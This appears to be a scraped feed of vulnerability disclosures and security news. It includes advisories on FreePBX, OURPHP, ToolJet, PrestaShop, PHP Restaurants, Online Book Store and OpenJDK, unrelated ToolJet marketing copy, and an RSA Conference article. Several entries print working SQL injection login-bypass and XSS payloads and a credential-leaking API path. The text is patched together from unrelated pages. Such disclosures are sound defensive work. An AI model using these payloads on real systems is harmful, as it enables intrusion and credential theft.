Sangoma FreePBX 1805 through 2302 (when obtained as a ,.ISO file) places AMPDBUSER, AMPDBPASS, AMPMGRUSER, and AMPMGRPASS in the list of global variables. This exposes cleartext authentication credentials for the Asterisk Database (MariaDB/MySQL) and Asterisk Manager Interface. For example, an attacker can make a /ari/asterisk/variable?variable=AMPDBPASS API call.

We have an active role in the security research field as we continuously search for new vulnerabilities. Our vulnerability disclosure policy follows the principles of responsible disclosure so as to allow software vendors to develop a patch to fix the vulnerable piece of code before we publish any details on the Internet.

**Sangoma FreePBX Linux Insecure Permissions**

**Vendor of the product:** Sangoma Technologies Corporation  
**Affected products:**  
   **Product:** Sangoma FreePBX Linux (ISO images SNG7-PBX16-64bit)  
      **Versions:** 2105,2109,2112,2201,2202,2203  
   **Product:** Sangoma FreePBX Linux (ISO images SNG7-(F)PBX-64bit)  
      **Versions:** 1805,1904,1910,2002,2008,2011,2104,2203,2302

**Attack Type:** Remote  
**Discovered:** 01/02/2023  
**Reported:** 28/02/2023  
**Disclosed:** 10/04/2023  
**Affected Components:** Asterisk REST Interface (ARI)  
**CVE assigned:** CVE-2023-26567  
**CVSS Score:** 6.8 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N)

**Vulnerability Description:** Sangoma FreePBX Linux 7 versions from 1805 to 2302, during installation from the official ISO images, add in their Asterisk list of global variables the AMPDBUSER, AMPDBPASS, AMPMGRUSER, AMPMGRPASS variables which expose cleartext authentication credentials for the Asterisk Database (MariaDB/MySQL) and Asterisk Manager Interface.

**Attack Vector:** To exploit the vulnerability, attackers must connect to either port 8088/tcp (HTTP/WS) or 8089/tcp (HTTPS/WSS), authenticate with the ARI service and issue a request to the specific API endpoint, as follows: /ari/asterisk/variable?variable=AMPDBPASS

**Impact:** If the Asterisk Database (MariaDB/MySQL) and/or Asterisk Manager Interface has been configured by the administrator to accept remote connections, attackers can issue Asterisk commands, read events, make configuration changes, extract useful information (e.g. extension passwords, SIP trunk information), download files from the filesystem and/or upload files to it (e.g. webshell).

**Recommended Post**

*   **LFI Vulnerability in 1024cms Admin Control Panel v1.1.0 Beta**
    
    07 April 2009
*   **XSS Vulnerability in 1024cms Admin Control Panel v1.1.0 Beta (Master-cPanel Package)**
    
    07 April 2009

**Quick Link**

CVE-2023-26567: Sangoma FreePBX Linux Insecure Permissions

OURPHP <= 7.2.0 is vulnerable to SQL Injection.

This function node on the website background can directly execute SQL statements, but requires a password code, which can be exploded. The default password code is 6 digits, and it will be exploded in a moment.

We try to execute the following statement

UPDATE ourphp_mail set OP_Mailpass='37e0c8f50a64a454' WHERE id='4';

You can see that this value is currently 123456

Then we execute the statement，And then use burp to explode the password code

See the prompt that the operation was successful

The value has also been changed

**Code download address**

https://down.chinaz.com/api/index/download?id=51308&type=code

Just download it and put it directly into PHPstudy

CVE-2023-30211: OURPHP <=v7.2.0 Background SQL injection

Tooljet v1.6 does not properly handle missing values in the API, allowing attackers to arbitrarily reset passwords via a crafted HTTP request.

We've raised $4.6m in funding 🚀

**Everything you  
need  
to build internal tools****Everything you need  
to build internal tools**

Open-source low-code application development platform for  
building and deploying business applications.

Trusted by large development teams worldwide.

**Building Blocks For  
Beautiful Interfaces**

Build complicated frontends without any experience in React,  
CSS or event HTML. Drag and drop 35+ in-built UI components  
to build even complicated frontends.

35+ UI components

Adding new components, resizing them, adjusting position, changing colors etc can be done using the visual app editor.

Drag and drop

Customize the component with in-built properties and styles without using a single line of code.

State inspector

Viewer for verifying current properties of components, queries and global states of applications.

Multi pages apps

Every app can have multiple pages that can be linked with each other.

We were looking for a low-code platform to migrate our team processes previously based on worksheets. By using Tooljet, we have been able to shorten significantly the design and development time of our tools and enrich their functionality. Moreover, the Tooljet team has always been reactive and keen to address our requests on the fly.

**Francois Xavier Lecarpentier**

Head of Research production management

**ToolJet Database**

ToolJet ships with an in-built no-code database built on top of  
PostgreSQL.

See this in action

The ability to create custom internal tools is a game-changer for us. ToolJet is our organization's key to enabling efficient internal operations and building to scale and transforming from start-up to established enterprise.“

**Meg McCafferty**

Head of Internal Systems

**Connect to 40+  
of your favourite tools**

In-built connectors for databases, RESTful/GraphQL  
endpoints, cloud storage services and SaaS apps. Use JavaScript or Python code to join and transform data.

Explore all connectors

ToolJet has really helped us build Byju’s Tuition Center and scale it in a very quick time. The easy customisation and crisp UI has made it very friendly for operations team.

**Siddhartha Chakraborti**

Associate Director Product

**Build With Your Team**

**Multiplayer Editing**

A dozen team members working on same app? no problem! changes from everyone is synced in realtime.

**Comment on Canvas**

Collaborate with all the stakeholders within the app builder using the comment feature.

We’ve been using Untitled to kick start every new project and can’t imagine working without it.We’ve been using Untitled to kick start every new project and can’t imagine working without “

**Candice Wu**

Product Manager,

**Enterprise ready**

SSO

Integrate with Okta, AzureAD, Google  
or OIDC for a seamless authentication

Audit Logging

Every action of users are logged  
and is searchable via dashboard.

Permissions & Access Control

Restrict the access to applications based on user groups.

Air-gapped deployment

On-premise installations of ToolJet does not require internet to function.

Multi-environment

Every application can have environments like staging, production, etc.

Priority Support

Phone, Slack and email support channels for quick response from our engineers.

We stumbled upon ToolJet which promised to build the tools that we need without writing a single line of code. Honestly we thought it was impossible, nevertheless gave it a try. Couple of few weeks later we had beautiful custom built dashboards embedded into the admin areas of our products with meaningful data points aggregated from multiple data sources.

**Unnikrishnan KP**

Head of Engineering

**Flexible and extensible**

Connect to databases, data lakes, SaaS tools, cloud storages,API endpoints and GraphQL endpoints to fetch data and take actions. ToolJet does not store

Open source

Write custom JS and Python code

Import  your own React components

Plugins

We’ve been using Untitled to kick start every new project and can’t imagine working without it.We’ve been using Untitled to kick start every new project and can’t imagine working without “

**Candice Wu**

Product Manager,

**Build apps that fits for any businesses**

**Join our Open- Source community**

Join our Slack community of 1300+ members and GitHub community of 300+ contributors!

CVE-2022-27978: Tooljet | Open-source low-code platform to build internal tools

A cross-site scripting (XSS) vulnerability in ToolJet v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comment Body component.

**Advisory**

**Software**: ToolJet  
**Vendor**: ToolJet Solutions Inc.  
**Affected Versions**: < 1.11.0  
**CVE**: CVE-2022-27979  
**CWE IDs**: 79  
**Reporter**: Chris Grieger

**Description**

https://github.com/ToolJet/ToolJet

    ToolJet is an open-source low-code framework to build and deploy internal tools quickly without much effort from the engineering teams. You can connect to your data sources, such as databases (like PostgreSQL, MongoDB, Elasticsearch, etc), API endpoints (ToolJet supports importing OpenAPI spec & OAuth2 authorization), and external services (like Stripe, Slack, Google Sheets, Airtable) and use our pre-built UI widgets to build internal tools.
    

Through improper sanitization of user input the the application an authenticated attacker to perform a stored Cross-site Scripting (XSS) attack on other users through the Comment component of the ToolJet Job Editor.

**POC**

Authenticated users can add a comment to a ToolJet app. When a users activates the comments 'submenu' the malicous javascript payload will be executed.

Following is an example that demonstrates the vulnerability.

<img style\="visibility:hidden" onerror\="console.log\`xss\`" src\="\_\_"\>

**Mitigation**

Update ToolJet to a version >= 1.11.0.

**Timeline**

Date

Action

2022/03/21

Contacted developers with security finding, POC and mitigation note.

2022/04/22

Fix version released.

CVE-2022-27979: security-advisories/20220321-tooljet-xss.md at main · fourcube/security-advisories

### Impact
It is possible for a user having access to the SQL Manager (Advanced Options -> Database) to arbitrary read any file on the Operating system when using SQL function LOAD_FILE in a SELECT request. So It can access to critical information.

### Patches
The patch will be on PS 8.0.4 and PS 1.7.8.9


**Arbitrary file read via SQL injection**

High severity GitHub Reviewed Published Apr 25, 2023 in PrestaShop/PrestaShop • Updated Apr 26, 2023

GHSA-8r4m-5p6p-52rp: Arbitrary file read via SQL injection

PHP Restaurants version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass and a cross site scripting vulnerability. Original discovery of SQL injection in this version is attributed to Nefrit ID in February of 2022.

    # Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & CrossSite Scripting# Google Dork: None# Date: 4/26/2023# Exploit Author: Or4nG.M4n# Vendor Homepage: https://github.com/jcwebhole# Software Link: https://github.com/jcwebhole/php_restaurants# Version: 1.0functions.phpfunction login(){global $conn;$email = $_POST['email'];$pw = $_POST['password'];$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` ='".md5($pw)."'"; <-- there is No filter to secure sql queryparm[email][password]$result = $conn->query($sql);if ($result->num_rows > 0) {while($row = $result->fetch_assoc()) {setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 dayheader('location: index.php');}} else {header('location: login.php?m=Wrong Password');}}login bypass at admin page /rest1/admin/login.phpemail & password : ' OR 1=1 --             <- add [space] end of the payloadcross site scripting main page /index.phpxhttp.open("GET", "functions.php?f=getRestaurants<?php  if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here wecan insert our xss payload?>  ", true);xhttp.send();</script> <-- when you insert your'e payload don't forget to add </script>likexss payload : </script><img onerror=alert(1) src=a>

PHP Restaurants 1.0 SQL Injection / Cross Site Scripting

Online Book Store version 1.0 suffers from a remote SQL injection vulnerability. This is a variant of the original vulnerability discovered in August of 2020 by Moaaz Taha.

    # Exploit Title: Online Book Store 1.0 - (process.php) SQL injection# Google Dork: 4/26/2023# Exploit Author: Or4nG.M4n# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip# Version: 1.0* STEPS *1- go to any book and add it to cart2- after that u will redirected to /cart.php3- click on Go To Checkout /checkout.php4- inject your'e injecton code in any of this post parametersparameters : name  address city zip_code country  foreach($_SESSION['cart'] as $isbn => $qty){    $bookprice = getbookprice($isbn);    $query = "INSERT INTO order_items VALUES <====== 1    ('$orderid', '$isbn', '$bookprice', '$qty')"; <====== 2    $result = mysqli_query($conn, $query); <====== 3    if(!$result){      echo "Insert value false!" . mysqli_error($conn2); <====== 4      exit;    }  }

Online Book Store 1.0 SQL Injection

Red Hat Security Advisory 2023-1895-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1895-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1895  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-11-openjdk-11.0.19.0.7-1.el8_7.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsMNzjgjWX9erEAQhqvw//WhLH9EibD9Wg9khIm+puypctGFF/sImh  
pUeoQmiaLk6YDvesqljArPjZnwA/4+jeTym8jczhJV9rBV9f4/LN4l/uGBNkiWtK  
pebt8SKFVrkIYyH6zos1vyMRNe937u9SgkvCyKbSFhPmCziDy2XaA2XL6ub+YWFn  
/1CNvy9wERStSpYQMonsH0fU+Fd/bmF/R2y6X7MfUEsCllKyjlxZ1lFkEpPoGHrh  
p4hIOA8hPxPoAJ4ThVTqCSVSv01B/YBiCmR10WnoWir7wj+pU3hEbuAPQs08CnqB  
tkLk1aaE68wAh2CMcblJK66w55SpHR6cot0qNa8F7z8MX3YuVwiIBDSGlCJ6Smnu  
ON8HNdn29JZ9Kj5apdi0edaX/ZZ0lP2KdeC22DIYtNz4h7G028MwB0YR9/Sh7wlx  
f3pYVeQZlKTOsl9pTFjgRaOesHhznS1S2Fe2ClOjCP6nltvq+paRCOy8jL2ZHc9b  
/2XCt7BHbWT4vUPO0gUpuJaVOrVBFuJxBOo1kpu1g/xsw7SlcuG+nCGAyLZ0WnlK  
SftlYMUiSNViMEBg4gGBj+nPrmISyfdyCUfEkPpxqcHFhiv3u309cBKZ0fWhXl1Q  
SAlH+hZuxFAnlgw1RuNCTxW9WEIydCtj/tASL6izRPJK/BX0VRZoAQUshCB0QlWy  
C1cyOJPSxKs=  
=4BgK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1895-01

Last year, 71% of enterprise breaches were pulled off quietly, with legitimate tools, research shows.

RSA CONFERENCE 2023 – San Francisco – With little more than smart reconnaissance and existing tools, adversaries are increasingly capable of compromising an enterprise network without making any noise or leaving a trace behind.

In fact, according to CrowdStrike CEO Jeff Hurtz and president Michael Sentonas, 71% of enterprise cyberattacks in calendar year 2022 were done without malware.

At this year's RSA Conference, Hurtz and Sentonas returned to the keynote stage to walk the audience through a case study of just how easily a threat actor can not just penetrate a network but also move laterally and persist without making a ripple, illustrating in stark terms the kind of challenge cybersecurity teams face trying to detect, much less mitigate, malwareless compromises.

The legendary cybersecurity duo profiled the "Spider" cybercrime group from the stage as a perfect example of the phenomenon.

"They're very well prepared, and they are very well resourced," Sentonas explained. "And they really like to leverage existing tools; there's no need to get fancy if you can just blend in."

**Spider: Anatomy of a Malwareless Attack**

First, Spider initiates an in-depth intelligence gathering effort. Hurtz said his team was able to establish the threat actor spent more than an hour on the phone with the victim company's help desk trying to get any insights that could fuel the next phase of social engineering. 

Once they had a specific user in their sights, Spider initiates a voice call informing the user their credentials had been compromised. Victims are then sent a malicious link and prompted to enter in not just their login details, but also their multifactor authentication (MFA) data. Once the user is tricked into handing those over, Spider is off and running.

"We call that the layer A problem," Hurtz joked, about the user handing over the goods. "It's between the chair and the keyboard."

Spider then uses the Tails operating system and Evilginx2 to compromise the user's credentials to set up an AnyDesk account controlled by the cyberattackers. AnyDesk remains a popular remote desktop tool among threat actors, Hurtz added.

Spider also uses dedicated machines that hide their identity, and run their code on hardware as much as possible to avoid detection. "It could be from anywhere," Sentonas said. "It blends in because its not going to come from some crazy domain."

Other tools, like DigitalOcean Droplet, used as a virtual machine, fill out the attack chain. Ultimately, Hurtz and Sentonas explained, the Spider attack ends with the persistent actor set up with their own users on the network, free and able to exfiltrate data at will. And importantly, Sentonas noted, if the threat actor can get into the on-premises network, the cloud is likely going to sync and become compromised as well.

Importantly, Sentonas and Hurtz wanted to disabuse the audience of the notion that threat actors need full admin access to set up new users. They don't, and Sentonas showed exactly how just delegated permissions could allow him to move freely about the company's customer relationship management system, as well as add themselves as a SQL server admin.

In the past couple of quarters, CrowdStrike has been dealing with about one enterprise per week reeling from this type of malware-free cyberattack, Sentonas said.

**How to Defend Against Malware-Free Cyberattacks**

